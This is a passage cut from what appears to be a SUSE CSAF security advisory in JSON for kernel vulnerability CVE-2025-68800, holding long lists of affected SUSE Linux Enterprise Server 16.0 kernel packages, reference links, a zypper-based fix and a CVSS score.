ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68800",
"url": "https://www.suse.com/security/cve/CVE-2025-68800"
},
{
"category": "external",
"summary": "SUSE Bug 1256646 for CVE-2025-68800",
"url": "https://bugzilla.suse.com/1256646"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
